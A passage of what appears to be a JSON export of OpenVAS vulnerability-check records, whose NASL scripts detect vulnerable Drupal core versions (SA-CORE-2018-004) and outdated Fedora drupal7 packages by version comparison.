vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"A remote code execution vulnerability exists within multiple subsystems of\n Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which\n could result in the site being compromised. This vulnerability is related to SA-CORE-2018-002 (CVE-2018-7600).\");\n\n script_tag(name:\"affected\", value:\"Drupal 7.x and 8.x\");\n\n script_tag(name:\"solution\", value:\"Update to version 7.59, 8.4.8, 8.5.3 or later.\");\n\n script_xref(name:\"URL\", value:\"https://www.drupal.org/sa-core-2018-004\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE)) {\n exit(0);\n}\n\nif (!infos = get_app_version_and_location(cpe: CPE, port: port, version_regex:\"^[0-9]\\.[0-9.]+\", exit_no_version: TRUE)) {\n exit(0);\n}\n\nversion = infos['version'];\npath = infos['location'];\n\nif (version_in_range(version: version, test_version: \"7.0\", test_version2: \"7.58\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"7.59\", install_path: path);\n security_message(port: port, data: report);\n exit(0);\n}\n\nif (version_in_range(version: version, test_version: \"8.0\", test_version2: \"8.4.7\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"8.4.8\", install_path: path);\n security_message(port: port, data: report);\n exit(0);\n}\n\nif (version_in_range(version: version, test_version: \"8.5\", test_version2: \"8.5.2\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"8.5.3\", install_path: path);\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:32:34", "description": "Drupal is prone to a remote code execution vulnerability.", "cvss3": {}, "published": "2018-04-26T00:00:00", "type": "openvas", "title": "Drupal Core Critical Remote Code Execution Vulnerability (SA-CORE-2018-004) (Windows, Version Check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7600", "CVE-2018-7602"], "modified": "2018-10-22T00:00:00", "id": "OPENVAS:1361412562310141029", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310141029", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_drupal_core_rce_vuln_SA-CORE-2018-004_win.nasl 12012 2018-10-22 09:20:29Z asteins $\n#\n# Drupal Core Critical Remote Code Execution Vulnerability (SA-CORE-2018-004) (Windows, Version Check)\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2018 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = 'cpe:/a:drupal:drupal';\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.141029\");\n script_version(\"$Revision: 12012 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-22 11:20:29 +0200 (Mon, 22 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2018-04-26 08:47:32 +0700 (Thu, 26 Apr 2018)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_cve_id(\"CVE-2018-7602\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Drupal Core Critical Remote Code Execution Vulnerability (SA-CORE-2018-004) (Windows, Version Check)\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"drupal_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"drupal/installed\", \"Host/runs_windows\");\n\n script_tag(name:\"summary\", value:\"Drupal is prone to a remote code execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"A remote code execution vulnerability exists within multiple subsystems of\n Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which\n could result in the site being compromised. This vulnerability is related to SA-CORE-2018-002 (CVE-2018-7600).\");\n\n script_tag(name:\"affected\", value:\"Drupal 7.x and 8.x\");\n\n script_tag(name:\"solution\", value:\"Update to version 7.59, 8.4.8, 8.5.3 or later.\");\n\n script_xref(name:\"URL\", value:\"https://www.drupal.org/sa-core-2018-004\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE)) {\n exit(0);\n}\n\nif (!infos = get_app_version_and_location(cpe: CPE, port: port, version_regex:\"^[0-9]\\.[0-9.]+\", exit_no_version: TRUE)) {\n exit(0);\n}\n\nversion = infos['version'];\npath = infos['location'];\n\nif (version_in_range(version: version, test_version: \"7.0\", test_version2: \"7.58\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"7.59\", install_path: path);\n security_message(port: port, data: report);\n exit(0);\n}\n\nif (version_in_range(version: version, test_version: \"8.0\", test_version2: \"8.4.7\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"8.4.8\", install_path: path);\n security_message(port: port, data: report);\n exit(0);\n}\n\nif (version_in_range(version: version, test_version: \"8.5\", test_version2: \"8.5.2\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"8.5.3\", install_path: path);\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:32:14", "description": "The remote host is missing an update for\n the ", "cvss3": {}, "published": "2019-05-10T00:00:00", "type": "openvas", "title": "Fedora Update for drupal7 FEDORA-2019-a06dffab1c", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-11358", "CVE-2012-2922"], "modified": "2019-05-14T00:00:00", "id": "OPENVAS:1361412562310876342", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310876342", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.876342\");\n script_version(\"2019-05-14T05:04:40+0000\");\n script_cve_id(\"CVE-2019-11358\", \"CVE-2012-2922\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"2019-05-14 05:04:40 +0000 (Tue, 14 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-05-10 02:11:35 +0000 (Fri, 10 May 2019)\");\n script_name(\"Fedora Update for drupal7 FEDORA-2019-a06dffab1c\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC29\");\n\n script_xref(name:\"FEDORA\", value:\"2019-a06dffab1c\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QV3PKZC3PQCO3273HAT76PAQZFBEO4KP\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for\n the 'drupal7' package(s) announced via the FEDORA-2019-a06dffab1c advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is\n present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Equipped with a powerful blend of features,\n Drupal is a Content Management System written in PHP that can support a\n variety of websites ranging from personal weblogs to large community-driven\n websites. Drupal is highly configurable, skinnable, and secure.\");\n\n script_tag(name:\"affected\", value:\"'drupal7' package(s) on Fedora 29.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"FC29\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"drupal7\", rpm:\"drupal7~7.66~1.fc29\", rls:\"FC29\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:32:15", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2019-05-07T00:00:00", "type": "openvas", "title": "Fedora Update for drupal7 FEDORA-2019-35589cfcb5", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-6341", "CVE-2012-2922"], "modified": "2019-05-14T00:00:00", "id": "OPENVAS:1361412562310876304", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310876304", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.876304\");\n script_version(\"2019-05-14T05:04:40+0000\");\n script_cve_id(\"CVE-2012-2922\", \"CVE-2019-6341\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"2019-05-14 05:04:40 +0000 (Tue, 14 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-05-07 02:43:26 +0000 (Tue, 07 May 2019)\");\n script_name(\"Fedora Update for drupal7 FEDORA-2019-35589cfcb5\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC29\");\n\n script_xref(name:\"FEDORA\", value:\"2019-35589cfcb5\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/P4KTET2PTSIS3ZZ4SGBRQEN6CCLV5SYX\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'drupal7'\n package(s) announced via the FEDORA-2019-35589cfcb5 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Equipped with a powerful blend of features, Drupal is a Content Management\nSystem written in PHP that can support a variety of websites ranging from\npersonal weblogs to large community-driven websites. Drupal is highly\nconfigurable, skinnable, and secure.\");\n\n script_tag(name:\"affected\", value:\"'drupal7' package(s) on Fedora 29.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"FC29\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"drupal7\", rpm:\"drupal7~7.65~1.fc29\", rls:\"FC29\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-06-05T01:40:46", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2019-05-26T00:00:00", "type": "openvas", "title": "Fedora Update for drupal7 FEDORA-2019-040857fd75", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-11358", "CVE-2019-11831", "CVE-2012-2922"], "modified": "2019-05-31T00:00:00", "id": "OPENVAS:1361412562310876410", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310876410", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.876410\");\n script_version(\"2019-05-31T13:18:49+0000\");\n script_cve_id(\"CVE-2019-11831\", \"CVE-2019-11358\", \"CVE-2012-2922\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-05-31 13:18:49 +0000 (Fri, 31 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-05-26 02:12:06 +0000 (Sun, 26 May 2019)\");\n script_name(\"Fedora Update for drupal7 FEDORA-2019-040857fd75\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC29\");\n\n script_xref(name:\"FEDORA\", value:\"2019-040857fd75\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/E3NUKPG7V4QEM6QXRMHYR4ABFMW5MM2P\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'drupal7'\n package(s) announced via the FEDORA-2019-040857fd75 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Equipped with a powerful blend of features, Drupal is a Content Management\nSystem written in PHP that can support a variety of websites ranging from\npersonal weblogs to large community-driven websites. Drupal is highly\nconfigurable, skinnable, and secure.\");\n\n script_tag(name:\"affected\", value:\"'drupal7' package(s) on Fedora 29.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"FC29\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"drupal7\", rpm:\"drupal7~7.67~1.fc29\", rls:\"FC29\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2018-01-18T11:09:19", "description": "Check for the Version of drupal7", "cvss3": {}, "published": "2013-01-08T00:00:00", "type": "openvas", "title": "Fedora Update for drupal7 FEDORA-2012-20766", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-5653", "CVE-2012-5651", "CVE-2012-5652", "CVE-2012-2922"], "modified": "2018-01-18T00:00:00", "id": "OPENVAS:864980", "href": "http://plugins.openvas.org/nasl.php?oid=864980", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for drupal7 FEDORA-2012-20766\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\ntag_affected = \"drupal7 on Fedora 17\";\ntag_insight = \"Equipped with a powerful blend of features, Drupal is a Content Management\n System written in PHP that can support a variety of websites ranging from\n personal weblogs to large community-driven websites. Drupal is highly\n configurable, skinnable, and secure.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2013-January/095371.html\");\n script_id(864980);\n script_version(\"$Revision: 8456 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-18 07:58:40 +0100 (Thu, 18 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-01-08 09:59:31 +0530 (Tue, 08 Jan 2013)\");\n script_cve_id(\"CVE-2012-2922\", \"CVE-2012-5651\", \"CVE-2012-5652\", \"CVE-2012-5653\");\n script_tag(name:\"cvss_base\", value:\"6.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_xref(name: \"FEDORA\", value: \"2012-20766\");\n script_name(\"Fedora Update for drupal7 FEDORA-2012-20766\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of drupal7\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC17\")\n{\n\n if ((res = isrpmvuln(pkg:\"drupal7\", rpm:\"drupal7~7.18~1.fc17\", rls:\"FC17\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 6.0, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-02-05T11:11:25", "description": "Check for the Version of drupal7", "cvss3": {}, "published": "2013-01-08T00:00:00", "type": "openvas", "title": "Fedora Update for drupal7 FEDORA-2012-20794", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-5653", "CVE-2012-5651", "CVE-2012-5652", "CVE-2012-2922"], "modified": "2018-02-03T00:00:00", "id": "OPENVAS:864982", "href": "http://plugins.openvas.org/nasl.php?oid=864982", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for drupal7 FEDORA-2012-20794\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\ntag_affected = \"drupal7 on Fedora 16\";\ntag_insight = \"Equipped with a powerful blend of features, Drupal is a Content Management\n System written in PHP that can support a variety of websites ranging from\n personal weblogs to large community-driven websites. Drupal is highly\n configurable, skinnable, and secure.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2013-January/095372.html\");\n script_id(864982);\n script_version(\"$Revision: 8650 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-02-03 13:16:59 +0100 (Sat, 03 Feb 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-01-08 09:59:59 +0530 (Tue, 08 Jan 2013)\");\n script_cve_id(\"CVE-2012-2922\", \"CVE-2012-5651\", \"CVE-2012-5652\", \"CVE-2012-5653\");\n script_tag(name:\"cvss_base\", value:\"6.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_xref(name: \"FEDORA\", value: \"2012-20794\");\n script_name(\"Fedora Update for drupal7 FEDORA-2012-20794\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of drupal7\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC16\")\n{\n\n if ((res = isrpmvuln(pkg:\"drupal7\", rpm:\"drupal7~7.18~1.fc16\", rls:\"FC16\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 6.0, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:38:05", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2013-01-08T00:00:00", "type": "openvas", "title": "Fedora Update for drupal7 FEDORA-2012-20794", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-5653", "CVE-2012-5651", "CVE-2012-5652", "CVE-2012-2922"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310864982", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310864982", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for drupal7 FEDORA-2012-20794\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2013-January/095372.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.864982\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-01-08 09:59:59 +0530 (Tue, 08 Jan 2013)\");\n script_cve_id(\"CVE-2012-2922\", \"CVE-2012-5651\", \"CVE-2012-5652\", \"CVE-2012-5653\");\n script_tag(name:\"cvss_base\", value:\"6.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_xref(name:\"FEDORA\", value:\"2012-20794\");\n script_name(\"Fedora Update for drupal7 FEDORA-2012-20794\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'drupal7'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC16\");\n script_tag(name:\"affected\", value:\"drupal7 on Fedora 16\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC16\")\n{\n\n if ((res = isrpmvuln(pkg:\"drupal7\", rpm:\"drupal7~7.18~1.fc16\", rls:\"FC16\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:38:24", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2013-01-08T00:00:00", "type": "openvas", "title": "Fedora Update for drupal7 FEDORA-2012-20766", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-5653", "CVE-2012-5651", "CVE-2012-5652", "CVE-2012-2922"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310864980", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310864980", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for drupal7 FEDORA-2012-20766\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2013-January/095371.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.864980\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-01-08 09:59:31 +0530 (Tue, 08 Jan 2013)\");\n 